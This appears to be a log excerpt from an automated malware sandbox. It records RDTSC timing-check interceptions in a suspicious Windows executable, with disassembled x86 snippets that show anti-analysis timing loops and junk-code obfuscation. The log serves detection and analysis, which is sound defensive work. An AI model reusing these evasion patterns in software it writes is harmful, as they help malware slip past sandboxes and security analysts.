Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A57D49 second address: A57DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jbe 00007F0E3850A34Ch 0x0000000d mov edi, dword ptr [ebp+122D1C81h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jne 00007F0E3850A349h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F0E3850A348h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov ebx, 058E565Bh 0x00000046 xor dword ptr [ebp+122D3234h], esi 0x0000004c mov eax, dword ptr [ebp+122D001Dh] 0x00000052 mov bl, DBh 0x00000054 push FFFFFFFFh 0x00000056 jne 00007F0E3850A34Ah 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f push ebx 0x00000060 jmp 00007F0E3850A355h 0x00000065 pop ebx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A58C6D second address: A58C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A57DCD second address: A57DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A57DD2 second address: A57DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A59D55 second address: A59D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A59D5B second address: A59D60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A58DC0 second address: A58DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A59D60 second address: A59D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A59D6C second address: A59D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A58DC4 second address: A58E4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, 3E0B501Ch 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F0E38E1CB18h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov ebx, edx 0x0000003c mov edi, ebx 0x0000003e mov eax, dword ptr [ebp+122D11DDh] 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007F0E38E1CB18h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e mov bx, 52F7h 0x00000062 push FFFFFFFFh 0x00000064 jmp 00007F0E38E1CB1Fh 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F0E38E1CB1Ch 0x00000071 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A59D75 second address: A59D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A58E4D second address: A58E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A59D79 second address: A59DEB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov di, ax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F0E3850A348h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b jmp 00007F0E3850A352h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F0E3850A348h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c push eax 0x0000004d jl 00007F0E3850A354h 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A58E53 second address: A58E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A66557 second address: A6655D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6655D second address: A66565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A66565 second address: A6656B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6EF96 second address: A6EF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6DD2D second address: A6DD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6DD43 second address: A6DD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E38E1CB1Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E307 second address: A6E30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E30B second address: A6E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E5BF second address: A6E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F0E3850A346h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E5CD second address: A6E5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E5D3 second address: A6E5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E770 second address: A6E78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6E78C second address: A6E791 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6EB87 second address: A6EB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6ED03 second address: A6ED0D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E3850A346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A6ED0D second address: A6ED13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A779BD second address: A779C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A76940 second address: A76946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A76946 second address: A7694A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A7694A second address: A7698F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0E38E1CB22h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F0E38E1CB2Fh 0x00000011 jmp 00007F0E38E1CB29h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F0E38E1CB2Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A7645B second address: A76488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E3850A357h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F0E3850A34Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A76488 second address: A764A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A77690 second address: A776B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E3850A351h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A776B0 second address: A776B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A7CC2E second address: A7CC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8150C second address: A81510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3F38A second address: A3F398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0E3850A346h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3FB04 second address: A3FB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB27h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3FB20 second address: A3FB4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F0E3850A364h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E3850A352h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3FB4E second address: A3FB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A4037B second address: A4037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A404E0 second address: A4055F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E38E1CB1Fh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jc 00007F0E38E1CB16h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007F0E38E1CB23h 0x00000024 jmp 00007F0E38E1CB21h 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d jmp 00007F0E38E1CB23h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A4055F second address: A40563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40563 second address: A40569 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A4060B second address: A40614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A40614 second address: A40632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a lea eax, dword ptr [ebp+1248A071h] 0x00000010 mov dword ptr [ebp+1246C759h], ecx 0x00000016 cmc 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A80719 second address: A8071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A80DD2 second address: A80DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A80DD8 second address: A80E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0E3850A35Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F0E3850A352h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0E3850A34Ah 0x0000001c jnc 00007F0E3850A358h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A80E1E second address: A80E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A80E23 second address: A80E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E3850A346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A80E2F second address: A80E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: 9FCBB0 second address: 9FCBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A82B80 second address: A82B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A82B8E second address: A82BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F0E3850A346h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A82BAA second address: A82BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A88B27 second address: A88B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A88B2D second address: A88B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A878DD second address: A878E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A87E5A second address: A87E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A87E5E second address: A87E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F0E3850A35Ch 0x0000000f jmp 00007F0E3850A34Ch 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A883CE second address: A883D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A883D4 second address: A883E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F0E3850A346h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A883E3 second address: A883EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007F0E38E1CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A883EF second address: A883F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A883F5 second address: A88401 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A88401 second address: A8841C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E3850A353h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8C123 second address: A8C129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8C129 second address: A8C131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8C131 second address: A8C136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8BB5E second address: A8BB73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8E668 second address: A8E66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8E66C second address: A8E68A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0E3850A34Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8E68A second address: A8E68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8E1D0 second address: A8E1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0E3850A346h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A8E1DE second address: A8E206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jns 00007F0E38E1CB16h 0x0000000c jmp 00007F0E38E1CB28h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A93AC8 second address: A93AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0E3850A346h 0x0000000a jnl 00007F0E3850A346h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A93AD8 second address: A93B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E38E1CB22h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A93C7D second address: A93C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A93C86 second address: A93CCA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 je 00007F0E38E1CB31h 0x0000000e jmp 00007F0E38E1CB25h 0x00000013 jc 00007F0E38E1CB16h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F0E38E1CB25h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A94106 second address: A9410C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9410C second address: A94116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A94116 second address: A9411A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9427A second address: A9427E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A06C00 second address: A06C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A06C04 second address: A06C0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A06C0A second address: A06C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0E3850A346h 0x0000000e rdtsc
